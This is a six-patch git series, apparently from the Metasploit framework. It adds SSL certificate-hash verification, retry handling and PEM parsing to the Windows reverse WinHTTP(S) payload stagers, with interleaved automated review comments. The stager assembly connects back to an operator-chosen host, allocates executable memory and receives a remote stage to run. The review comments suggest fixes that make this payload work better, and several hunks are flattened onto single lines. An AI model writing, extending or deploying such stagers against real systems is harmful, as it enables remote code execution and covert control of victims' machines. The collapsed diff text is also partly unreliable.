From 11593800b6ffb91d486ebcabdbf0b2630d729b07 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Sat, 14 Mar 2015 15:52:23 -0500
Subject: [PATCH 1/6] Move X509 PEM parsing into Rex::Parser::X509Certificate

---
lib/rex/parser/x509_certificate.rb | 62 ++++++++++++++++++++++++++++++
lib/rex/socket/ssl_tcp_server.rb | 21 +--------
2 files changed, 64 insertions(+), 19 deletions(-)
create mode 100644 lib/rex/parser/x509_certificate.rb

diff --git a/lib/rex/parser/x509_certificate.rb b/lib/rex/parser/x509_certificate.rb
new file mode 100644
index 0000000000..f46500bf5c
--- /dev/null
+++ b/lib/rex/parser/x509_certificate.rb
@@ -0,0 +1,62 @@
+# -*- coding: binary -*-
+
+require 'openssl'
+
+module Rex
+module Parser
+
+###
+#
+# This class parses the contents of a PEM-encoded X509 certificate file containing
+# a private key, a public key, and any appended glue certificates.
+#
+###
+class X509Certificate
+
+ #
+ # Parse a certificate in unified PEM format that contains a private key and
+ # one or more certificates. The first certificate is the primary, while any
+ # additional certificates are treated as intermediary certificates. This emulates
+ # the behavior of web servers like nginx.
+ #
+ # @param [String] ssl_cert
+ # @return [String, String, Array]
+ def self.parse_pem(ssl_cert)
+ cert = nil
+ key = nil
+ chain = nil
+
+ certs = []
+ ssl_cert.scan(/-----BEGIN\s*[^\-]+-----+\r?\n[^\-]*-----END\s*[^\-]+-----\r?\n?/nm).each do |pem|
+ if pem =~ /PRIVATE KEY/
+ key = OpenSSL::PKey::RSA.new(pem)
+ elsif pem =~ /CERTIFICATE/
+ certs << OpenSSL::X509::Certificate.new(pem)
+ end
+ end
+
+ cert = certs.shift
+ if certs.length > 0
+ chain = certs
+ end
+
+ [key, cert, chain]
+ end
+
+ #
+ # Parse a certificate in unified PEM format from a file
+ #
+ # @param [String] ssl_cert_file
+ # @return [String, String, Array]
+ def self.parse_pem_file(ssl_cert_file)
+ data = ''
+ ::File.open(ssl_cert_file, 'rb') do |fd|
+ data << fd.read(fd.stat.size)
+ end
+ parse_pem(data)
+ end
+
+end
+
+end
+end
diff --git a/lib/rex/socket/ssl_tcp_server.rb b/lib/rex/socket/ssl_tcp_server.rb
index 27ee44696f..742685d596 100644
--- a/lib/rex/socket/ssl_tcp_server.rb
+++ b/lib/rex/socket/ssl_tcp_server.rb
@@ -2,6 +2,7 @@
 require 'rex/socket'
 require 'rex/socket/tcp_server'
 require 'rex/io/stream_server'
+require 'rex/parser/x509_certificate'
 
 ###
 #
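Review bot: The `@return [String, String, Array]` tags on `parse_pem` and `parse_pem_file` do not describe what the method builds: `key` comes from `OpenSSL::PKey::RSA.new`, `cert` from `OpenSSL::X509::Certificate.new`, and `chain` is `nil` unless intermediates follow, so the tag should read `@return [OpenSSL::PKey::RSA, OpenSSL::X509::Certificate, Array<OpenSSL::X509::Certificate>, nil]` with a sentence saying the chain is nil when only one certificate is present. The same stale tag sits on `ssl_parse_pem` in ssl_tcp_server.rb, which now just delegates here. Separately, the PRIVATE KEY branch hard-codes `OpenSSL::PKey::RSA.new(pem)`; a PEM block for any other key type still matches `/PRIVATE KEY/` and the call raises from OpenSSL, so either document that only RSA keys are accepted or load with `OpenSSL::PKey.read(pem)`, which accepts every key type the library supports.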
@@ -108,25 +109,7 @@ module Rex::Socket::SslTcpServer
 # @param [String] ssl_cert
 # @return [String, String, Array]
 def self.ssl_parse_pem(ssl_cert)
- cert = nil
- key = nil
- chain = nil
-
- certs = []
- ssl_cert.scan(/-----BEGIN\s*[^\-]+-----+\r?\n[^\-]*-----END\s*[^\-]+-----\r?\n?/nm).each do |pem|
- if pem =~ /PRIVATE KEY/
- key = OpenSSL::PKey::RSA.new(pem)
- elsif pem =~ /CERTIFICATE/
- certs << OpenSSL::X509::Certificate.new(pem)
- end
- end
-
- cert = certs.shift
- if certs.length > 0
- chain = certs
- end
-
- [key, cert, chain]
+ Rex::Parser::X509Certificate.parse_pem(ssl_cert)
 end
 
 #

From 03019cf451a008737144ff5e237d030e2c1d214c Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Sat, 14 Mar 2015 15:53:21 -0500
Subject: [PATCH 2/6] Adds StagerVerifySSLCert support (SHA1 of HandlerSSLCert)

---
.../core/payload/windows/reverse_winhttp.rb | 107 ++++++++++++++++--
.../core/payload/windows/reverse_winhttps.rb | 59 +++++++++-
2 files changed, 156 insertions(+), 10 deletions(-)

diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb
index bbb4d94575..c8851e609b 100644
--- a/lib/msf/core/payload/windows/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttp.rb
@@ -104,18 +104,29 @@ module Payload::Windows::ReverseWinHttp def asm_reverse_winhttp(opts={}) + verify_ssl = nil + encoded_cert_hash = nil + # - # options should contain: - # ssl: (true|false) - # url: "/url_to_request" - # host: [hostname] - # port: [port] - # exitfunk: [process|thread|seh|sleep] + # options can contain contain: + # ssl: (true|false) + # url: "/url_to_request" + # host: [hostname] + # port: [port] + # exitfunk: [process|thread|seh|sleep] + # verify_ssl: (true|false) + # verify_cert_hash: (40-byte SHA1 hash) # encoded_url = asm_generate_wchar_array(opts[:url]) encoded_host = asm_generate_wchar_array(opts[:host]) + if opts[:ssl] && opts[:verify_cert] && opts[:verify_cert_hash] + verify_ssl = true + encoded_cert_hash = opts[:verify_cert_hash].unpack("C*").map{|c| "0x%.2x" % c }.join(",") + end + + http_open_flags = 0 if opts[:ssl] @@ -137,7 +148,20 @@ module Payload::Windows::ReverseWinHttp push esp ; Push a pointer to the "winhttp" string push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) call ebp ; LoadLibraryA( "winhttp" ) + ^ + if verify_ssl + asm << %Q^ + load_crypt32: + push 0x00323374 ; Push the string 'crypt32',0 + push 0x70797263 ; ... + push esp ; Push a pointer to the "crypt32" string + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "wincrypt" ) + ^ + end + + asm << %Q^ set_retry: push.i8 6 ; retry 6 times pop edi @@ -215,7 +239,7 @@ module Payload::Windows::ReverseWinHttp push 0x91BB5895 ; hash( "winhttp.dll", "WinHttpSendRequest" ) call ebp test eax,eax - jnz receive_response ; if TRUE call WinHttpReceiveResponse API + jnz check_response ; if TRUE call WinHttpReceiveResponse API try_it_again: dec edi 
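Review bot: The new option table is out of step with the check below it: the comment lists `verify_ssl: (true|false)` and `verify_cert_hash: (40-byte SHA1 hash)`, but the code tests `opts[:verify_cert]`, and the `unpack("C*")` encoding feeding the 20-byte compare in the assembly expects the raw digest bytes, not a 40-character hex string. Rename the comment entries to `verify_cert` and `(20-byte raw SHA1 hash)`, and reject a wrong-sized value before it is embedded, e.g. `raise ArgumentError, "verify_cert_hash must be a 20-byte raw SHA1 digest" unless opts[:verify_cert_hash].bytesize == 20`; otherwise a hex string would be assembled silently and the stager would compare the wrong bytes. `asm_reverse_winhttp` continues past this hunk.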
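Review bot: The comment on the `call ebp` line of the new `load_crypt32` stub says `LoadLibraryA( "wincrypt" )`, while the two pushes above it build the string 'crypt32' and the later hash comment names crypt32.dll; change it to `call ebp ; LoadLibraryA( "crypt32" )` so the label, the string and the comment agree. The enclosing `asm_reverse_winhttp` starts and ends outside this hunk.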
@@ -237,10 +261,77 @@ module Payload::Windows::ReverseWinHttp ^ end + # Jump target if the request was sent successfully + asm << %Q^ + check_response: + ^ + + # Verify the SSL certificate hash + if verify_ssl + + asm << %Q^ + ssl_cert_get_context: + push.i8 4 + mov ecx, esp ; Allocate &bufferLength + push.i8 0 + mov ebx, esp ; Allocate &buffer (ebx will point to *pCert) + + push ecx ; &bufferLength + push ebx ; &buffer + push.i8 78 ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT) + push esi ; hHttpRequest + push 0x272F0478 ; hash( "winhttp.dll", "WinHttpQueryOption" ) + call ebp + test eax, eax ; + jz failure ; Bail out if we couldn't get the certificate context + + ; ebx + ssl_cert_allocate_hash_space: + push.i8 20 ; + mov ecx, esp ; Store a reference to the address of 20 + sub esp,[ecx] ; Allocate 20 bytes for the hash output + mov edi, esp ; edi will point to our buffer + + ssl_cert_get_server_hash: + push ecx ; &bufferLength + push edi ; &buffer (20-byte SHA1 hash) + push.i8 3 ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID) + push [ebx] ; *pCert + push 0xC3A96E2D ; hash( "crypt32.dll", "CertGetCertificateContextProperty" ) + call ebp + test eax, eax ; + jz failure ; Bail out if we couldn't get the certificate context + + ssl_cert_start_verify: + call ssl_cert_compare_hashes + db #{encoded_cert_hash} + + ssl_cert_compare_hashes: + pop ebx ; ebx points to our internal 20-byte certificate hash (overwites *pCert) + ; edi points to the server-provided certificate hash + + push.i8 4 ; Compare 20 bytes (5 * 4) by repeating 4 more times + pop ecx ; + mov edx, ecx ; Keep a reference to 4 in edx + + ssl_cert_verify_compare_loop: + mov eax, [ebx] ; Grab the next DWORD of the hash + cmp eax, [edi] ; Compare with the server hash + jnz failure ; Bail out if the DWORD doesn't match + add ebx, edx ; Increment internal hash pointer by 4 + add edi, edx ; Increment server hash pointer by 4 + loop ssl_cert_verify_compare_loop + + ; Our certificate hash was valid, hurray! 
+ ssl_cert_verify_cleanup: + xor ebx, ebx ; Reset ebx back to zero + ^ + end + asm << %Q^ receive_response: ; The API WinHttpReceiveResponse needs to be called - ; first to get a valid handler for WinHttpReadData + ; first to get a valid handle for WinHttpReadData push ebx ; Reserved (NULL) [2] push esi ; Request handler returned by WinHttpSendRequest [1] push 0x709D8805 ; hash( "winhttp.dll", "WinHttpReceiveResponse" ) diff --git a/lib/msf/core/payload/windows/reverse_winhttps.rb b/lib/msf/core/payload/windows/reverse_winhttps.rb index 4a219c8b4e..04f1bdc323 100644 --- a/lib/msf/core/payload/windows/reverse_winhttps.rb +++ b/lib/msf/core/payload/windows/reverse_winhttps.rb @@ -2,6 +2,7 @@ require 'msf/core' require 'msf/core/payload/windows/reverse_winhttp' +require 'rex/parser/x509_certificate' module Msf @@ -17,6 +18,17 @@ module Payload::Windows::ReverseWinHttps include Msf::Payload::Windows::ReverseWinHttp + # + # Register reverse_winhttps specific options + # + def initialize(*args) + super + register_advanced_options( + [ + OptBool.new('StagerVerifySSLCert', [true, 'Whether to verify the SSL certificate hash in the handler', false]) + ], self.class) + end + # # Generate and compile the stager # 
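Review bot: The compare loop under `ssl_cert_compare_hashes` appears to check only 16 of the 20 hash bytes: `ecx` is loaded with 4 and the x86 `loop` instruction decrements before it tests, so the body runs four times and the fifth DWORD of the SHA-1 digest is never compared with the server-provided value. The comment `Compare 20 bytes (5 * 4) by repeating 4 more times` states the intent, so the smallest fix is to keep `edx` as the 4-byte stride and bump the counter, e.g. add `inc ecx ; five DWORDs = 20 bytes` after `mov edx, ecx`. The second `jz failure` in `ssl_cert_get_server_hash` also repeats the comment from the previous block; it should say `Bail out if we couldn't read the certificate hash`. `asm_reverse_winhttp` starts and ends outside this hunk.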
@@ -37,13 +49,37 @@ module Payload::Windows::ReverseWinHttps # def generate + verify_cert = false + verify_cert_hash = nil + + if datastore['StagerVerifySSLCert'] + unless datastore['HandlerSSLCert'] + raise ArgumentError, "StagerVerifySSLCert is enabled but no HandlerSSLCert is configured" + else + verify_cert = true + hcert = Rex::Parser::X509Certificate.parse_pem_file(datastore['HandlerSSLCert']) + unless hcert and hcert[0] and hcert[1] + raise ArgumentError, "Could not parse a private key and certificate from #{datastore['HandlerSSLCert']}" + end + verify_cert_hash = Rex::Text.sha1_raw(hcert[1].to_der) + print_status("Stager will verify SSL Certificate with SHA1 hash #{verify_cert_hash.unpack("H*").first}") + end + end + # Generate the simple version of this stager if we don't have enough space if self.available_space.nil? || required_space > self.available_space + + if datastore['StagerVerifySSLCert'] + raise ArgumentError, "StagerVerifySSLCert is enabled but not enough payload space is available" + end + return generate_reverse_winhttps( ssl: true, host: datastore['LHOST'], port: datastore['LPORT'], - url: generate_small_uri) + url: generate_small_uri, + verify_cert: verify_cert, + verify_cert_hash: verify_cert_hash) end conf = { @@ -51,12 +87,31 @@ module Payload::Windows::ReverseWinHttps host: datastore['LHOST'], port: datastore['LPORT'], url: generate_uri, - exitfunk: datastore['EXITFUNC'] + exitfunk: datastore['EXITFUNC'], + verify_cert: verify_cert, + verify_cert_hash: verify_cert_hash } generate_reverse_winhttps(conf) end + # + # Determine the maximum amount of space required for the features requested + # + def required_space + space = super + + # SSL support adds 20 bytes + space += 20 + + # SSL verification adds 120 bytes + if datastore['StagerVerifySSLCert'] + space += 120 + end + + space + end + end end From 0d12ca49a7c684ed3acfc9a44c828d409e99bb9e Mon Sep 17 00:00:00 2001 
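Review bot: `Rex::Parser::X509Certificate.parse_pem_file` is called on the operator-supplied `HandlerSSLCert` path without handling the errors it can raise, so a missing file or a malformed PEM surfaces as a raw `Errno::*` or `OpenSSL::*` exception instead of the `ArgumentError` the surrounding checks use; wrap the call with `rescue Errno::ENOENT, OpenSSL::OpenSSLError => e` and re-raise as `raise ArgumentError, "Could not load HandlerSSLCert #{datastore['HandlerSSLCert']}: #{e.message}"`. The `unless ... else` form is also the inverted shape the style guide warns about; a guard `raise ArgumentError, "..." unless datastore['HandlerSSLCert']` followed by the straight-line body reads more directly, and `unless hcert and hcert[0] and hcert[1]` should use `&&` rather than `and`. `generate` continues into the next hunk.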
From: HD Moore Date: Sat, 14 Mar 2015 16:19:13 -0500 Subject: [PATCH 3/6] Work around lack of option normalization during size calculation --- lib/msf/core/payload/windows/reverse_winhttps.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/payload/windows/reverse_winhttps.rb b/lib/msf/core/payload/windows/reverse_winhttps.rb index 04f1bdc323..bfcaaa3ff9 100644 --- a/lib/msf/core/payload/windows/reverse_winhttps.rb +++ b/lib/msf/core/payload/windows/reverse_winhttps.rb @@ -25,7 +25,7 @@ module Payload::Windows::ReverseWinHttps super register_advanced_options( [ - OptBool.new('StagerVerifySSLCert', [true, 'Whether to verify the SSL certificate hash in the handler', false]) + OptBool.new('StagerVerifySSLCert', [false, 'Whether to verify the SSL certificate hash in the handler', false]) ], self.class) end @@ -52,7 +52,7 @@ module Payload::Windows::ReverseWinHttps verify_cert = false verify_cert_hash = nil - if datastore['StagerVerifySSLCert'] + if datastore['StagerVerifySSLCert'].to_s =~ /^(t|y|1)/i unless datastore['HandlerSSLCert'] raise ArgumentError, "StagerVerifySSLCert is enabled but no HandlerSSLCert is configured" else @@ -69,7 +69,7 @@ module Payload::Windows::ReverseWinHttps # Generate the simple version of this stager if we don't have enough space if self.available_space.nil? || required_space > self.available_space - if datastore['StagerVerifySSLCert'] + if datastore['StagerVerifySSLCert'].to_s =~ /^(t|y|1)/i raise ArgumentError, "StagerVerifySSLCert is enabled but not enough payload space is available" end From 8e37342c502e1b1ab06c4ffb90fa161886cfc3b9 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sat, 14 Mar 2015 16:52:04 -0500 Subject: [PATCH 4/6] Comment typo --- lib/msf/core/payload/windows/reverse_winhttp.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index c8851e609b..d20c63e7a5 100644 
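Review bot: The normalization added at the two checks in `generate` is not applied to the third site that reads the same option: `required_space`, added in the previous patch, still tests `if datastore['StagerVerifySSLCert']` directly, so if the raw value can be a String such as "false" as the commit message describes, the size calculation would add the 120 verification bytes even when the option is off. Apply the same test there, or hoist it into one predicate the three sites share, e.g. `def verify_ssl_cert?; datastore['StagerVerifySSLCert'].to_s =~ /^(t|y|1)/i; end`. Note also that `^` matches at any line start; `\A` pins the test to the start of the string.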
--- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb @@ -307,7 +307,7 @@ module Payload::Windows::ReverseWinHttp db #{encoded_cert_hash} ssl_cert_compare_hashes: - pop ebx ; ebx points to our internal 20-byte certificate hash (overwites *pCert) + pop ebx ; ebx points to our internal 20-byte certificate hash (overwrites *pCert) ; edi points to the server-provided certificate hash push.i8 4 ; Compare 20 bytes (5 * 4) by repeating 4 more times @@ -390,6 +390,8 @@ module Payload::Windows::ReverseWinHttp asm end + + end end From 69d92807482c8e40c6b142a5d43d4b55e35ff81c Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 16 Mar 2015 13:52:13 -0500 Subject: [PATCH 5/6] Fix yard docs, retries, push.i8 instructions. See commit 05138524e387e9ad7bb33f97db589e9dc70f45f1 Note that StagerRetryCount is not defined here, but will be in the parent class once #4934 lands --- .../core/payload/windows/reverse_winhttp.rb | 102 +++++++++--------- .../core/payload/windows/reverse_winhttps.rb | 6 +- 2 files changed, 54 insertions(+), 54 deletions(-) diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index d20c63e7a5..0fc78adfe2 100644 --- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb @@ -36,7 +36,8 @@ module Payload::Windows::ReverseWinHttp ssl: false, host: datastore['LHOST'], port: datastore['LPORT'], - url: generate_small_uri) + url: generate_small_uri, + retry_count: datastore['StagerRetryCount']) end conf = { @@ -44,7 +45,8 @@ module Payload::Windows::ReverseWinHttp host: datastore['LHOST'], port: datastore['LPORT'], url: generate_uri, - exitfunk: datastore['EXITFUNC'] + exitfunk: datastore['EXITFUNC'], + retry_count: datastore['StagerRetryCount'] } generate_reverse_winhttp(conf) 
@@ -98,28 +100,26 @@ module Payload::Windows::ReverseWinHttp join(",") end + # - # Dynamic payload generation + # Generate an assembly stub with the configured feature set and options. + # + # @option opts [Bool] :ssl Whether or not to enable SSL + # @option opts [String] :url The URI to request during staging + # @option opts [String] :host The host to connect to + # @option opts [Fixnum] :port The port to connect to + # @option opts [Bool] :verify_ssl Whether or not to do SSL certificate validation + # @option opts [String] :verify_cert_hash A 20-byte raw SHA-1 hash of the certificate to verify + # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh + # @option opts [Fixnum] :retry_count The number of times to retry a failed request before giving up # def asm_reverse_winhttp(opts={}) - - verify_ssl = nil + retry_count = [opts[:retry_count].to_i, 1].max + verify_ssl = nil encoded_cert_hash = nil - - # - # options can contain contain: - # ssl: (true|false) - # url: "/url_to_request" - # host: [hostname] - # port: [port] - # exitfunk: [process|thread|seh|sleep] - # verify_ssl: (true|false) - # verify_cert_hash: (40-byte SHA1 hash) - # - - encoded_url = asm_generate_wchar_array(opts[:url]) - encoded_host = asm_generate_wchar_array(opts[:host]) + encoded_url = asm_generate_wchar_array(opts[:url]) + encoded_host = asm_generate_wchar_array(opts[:host]) if opts[:ssl] && opts[:verify_cert] && opts[:verify_cert_hash] verify_ssl = true 
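Review bot: The new YARD block documents `@option opts [Bool] :verify_ssl`, but the check a few lines below reads `opts[:verify_cert]`, which is also the key reverse_winhttps.rb passes, so the tag should be `@option opts [Bool] :verify_cert Whether or not to do SSL certificate validation`. Separately, `retry_count = [opts[:retry_count].to_i, 1].max` turns a nil `datastore['StagerRetryCount']`, which the commit message says is not defined yet, into a single attempt, whereas the code removed in the next hunk retried 6 times; until the option exists, `retry_count = [(opts[:retry_count] || 6).to_i, 1].max` keeps the previous behaviour. `asm_reverse_winhttp` continues past this hunk.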
@@ -162,45 +162,38 @@ module Payload::Windows::ReverseWinHttp end asm << %Q^ - set_retry: - push.i8 6 ; retry 6 times - pop edi - xor ebx, ebx - mov ecx, edi - push_zeros: - push ebx ; NULL values for the WinHttpOpen API parameters - loop push_zeros + xor ebx, ebx WinHttpOpen: - ; Flags [5] - ; ProxyBypass (NULL) [4] - ; ProxyName (NULL) [3] - ; AccessType (DEFAULT_PROXY= 0) [2] - ; UserAgent (NULL) [1] + push ebx ; Flags + push ebx ; ProxyBypass (NULL) + push ebx ; ProxyName (NULL) + push ebx ; AccessType (DEFAULT_PROXY= 0) + push ebx ; UserAgent (NULL) [1] push 0xBB9D1F04 ; hash( "winhttp.dll", "WinHttpOpen" ) call ebp WinHttpConnect: - push ebx ; Reserved (NULL) [4] + push ebx ; Reserved (NULL) push #{opts[:port]} ; Port [3] call got_server_uri ; Double call to get pointer for both server_uri and - server_uri: ; server_host; server_uri is saved in EDI for later + server_uri: ; server_host; server_uri is saved in edi for later db #{encoded_url} got_server_host: - push eax ; Session handle returned by WinHttpOpen [1] + push eax ; Session handle returned by WinHttpOpen push 0xC21E9B46 ; hash( "winhttp.dll", "WinHttpConnect" ) call ebp WinHttpOpenRequest: push.i32 #{"0x%.8x" % http_open_flags} - push ebx ; AcceptTypes (NULL) [6] - push ebx ; Referrer (NULL) [5] - push ebx ; Version (NULL) [4] - push edi ; ObjectName (URI) [3] - push ebx ; Verb (GET method) (NULL) [2] - push eax ; Connect handler returned by WinHttpConnect [1] + push ebx ; AcceptTypes (NULL) + push ebx ; Referrer (NULL) + push ebx ; Version (NULL) + push edi ; ObjectName (URI) + push ebx ; Verb (GET method) (NULL) + push eax ; Connect handle returned by WinHttpConnect push 0x5BB31098 ; hash( "winhttp.dll", "WinHttpOpenRequest" ) call ebp xchg esi, eax ; save HttpRequest handler in esi 
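Review bot: In the rewritten `WinHttpOpen` block the `[N]` argument-position markers were dropped from four of the five pushes but left on `push ebx ; UserAgent (NULL) [1]`, and the unchanged `push #{opts[:port]} ; Port [3]` in `WinHttpConnect` keeps one as well; either drop the remaining markers or restore them on every push so the annotation is consistent across the call sequence. `asm_reverse_winhttp` starts and ends outside this hunk.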
@@ -216,9 +209,9 @@ module Payload::Windows::ReverseWinHttp ;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE ;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA mov eax, esp - push.i8 4 ; sizeof(buffer) + push 4 ; sizeof(buffer) push eax ; &buffer - push.i8 31 ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS) + push 31 ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS) push esi ; hHttpRequest push 0xCE9D58D3 ; hash( "winhttp.dll", "WinHttpSetOption" ) call ebp @@ -226,6 +219,11 @@ module Payload::Windows::ReverseWinHttp end asm << %Q^ + ; Store our retry counter in the edi register + set_retry: + push #{retry_count} + pop edi + send_request: WinHttpSendRequest: @@ -271,14 +269,14 @@ module Payload::Windows::ReverseWinHttp asm << %Q^ ssl_cert_get_context: - push.i8 4 + push 4 mov ecx, esp ; Allocate &bufferLength - push.i8 0 + push 0 mov ebx, esp ; Allocate &buffer (ebx will point to *pCert) push ecx ; &bufferLength push ebx ; &buffer - push.i8 78 ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT) + push 78 ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT) push esi ; hHttpRequest push 0x272F0478 ; hash( "winhttp.dll", "WinHttpQueryOption" ) call ebp @@ -287,7 +285,7 @@ module Payload::Windows::ReverseWinHttp ; ebx ssl_cert_allocate_hash_space: - push.i8 20 ; + push 20 ; mov ecx, esp ; Store a reference to the address of 20 sub esp,[ecx] ; Allocate 20 bytes for the hash output mov edi, esp ; edi will point to our buffer @@ -295,7 +293,7 @@ module Payload::Windows::ReverseWinHttp ssl_cert_get_server_hash: push ecx ; &bufferLength push edi ; &buffer (20-byte SHA1 hash) - push.i8 3 ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID) + push 3 ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID) push [ebx] ; *pCert push 0xC3A96E2D ; hash( "crypt32.dll", "CertGetCertificateContextProperty" ) call ebp 
@@ -310,7 +308,7 @@ module Payload::Windows::ReverseWinHttp pop ebx ; ebx points to our internal 20-byte certificate hash (overwrites *pCert) ; edi points to the server-provided certificate hash - push.i8 4 ; Compare 20 bytes (5 * 4) by repeating 4 more times + push 4 ; Compare 20 bytes (5 * 4) by repeating 4 more times pop ecx ; mov edx, ecx ; Keep a reference to 4 in edx @@ -332,8 +330,8 @@ module Payload::Windows::ReverseWinHttp receive_response: ; The API WinHttpReceiveResponse needs to be called ; first to get a valid handle for WinHttpReadData - push ebx ; Reserved (NULL) [2] - push esi ; Request handler returned by WinHttpSendRequest [1] + push ebx ; Reserved (NULL) + push esi ; Request handler returned by WinHttpSendRequest push 0x709D8805 ; hash( "winhttp.dll", "WinHttpReceiveResponse" ) call ebp test eax,eax @@ -342,7 +340,7 @@ module Payload::Windows::ReverseWinHttp asm << %Q^ allocate_memory: - push.i8 0x40 ; PAGE_EXECUTE_READWRITE + push 0x40 ; PAGE_EXECUTE_READWRITE push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (4Mb ought to do us) push ebx ; NULL as we dont care where the allocation is diff --git a/lib/msf/core/payload/windows/reverse_winhttps.rb b/lib/msf/core/payload/windows/reverse_winhttps.rb index bfcaaa3ff9..993347db35 100644 --- a/lib/msf/core/payload/windows/reverse_winhttps.rb +++ b/lib/msf/core/payload/windows/reverse_winhttps.rb @@ -79,7 +79,8 @@ module Payload::Windows::ReverseWinHttps port: datastore['LPORT'], url: generate_small_uri, verify_cert: verify_cert, - verify_cert_hash: verify_cert_hash) + verify_cert_hash: verify_cert_hash, + retry_count: datastore['StagerRetryCount']) end conf = { @@ -89,7 +90,8 @@ module Payload::Windows::ReverseWinHttps url: generate_uri, exitfunk: datastore['EXITFUNC'], verify_cert: verify_cert, - verify_cert_hash: verify_cert_hash + verify_cert_hash: verify_cert_hash, + retry_count: datastore['StagerRetryCount'] } generate_reverse_winhttps(conf) 
From 5fd3637d34c9b6365593d34451dce5cacf4078f6 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 16 Mar 2015 14:00:51 -0500 Subject: [PATCH 6/6] Remove the i32 size specifier (not needed) --- lib/msf/core/payload/windows/reverse_winhttp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index 0fc78adfe2..8a5be39790 100644 --- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb @@ -187,7 +187,7 @@ module Payload::Windows::ReverseWinHttp WinHttpOpenRequest: - push.i32 #{"0x%.8x" % http_open_flags} + push #{"0x%.8x" % http_open_flags} push ebx ; AcceptTypes (NULL) push ebx ; Referrer (NULL) push ebx ; Version (NULL)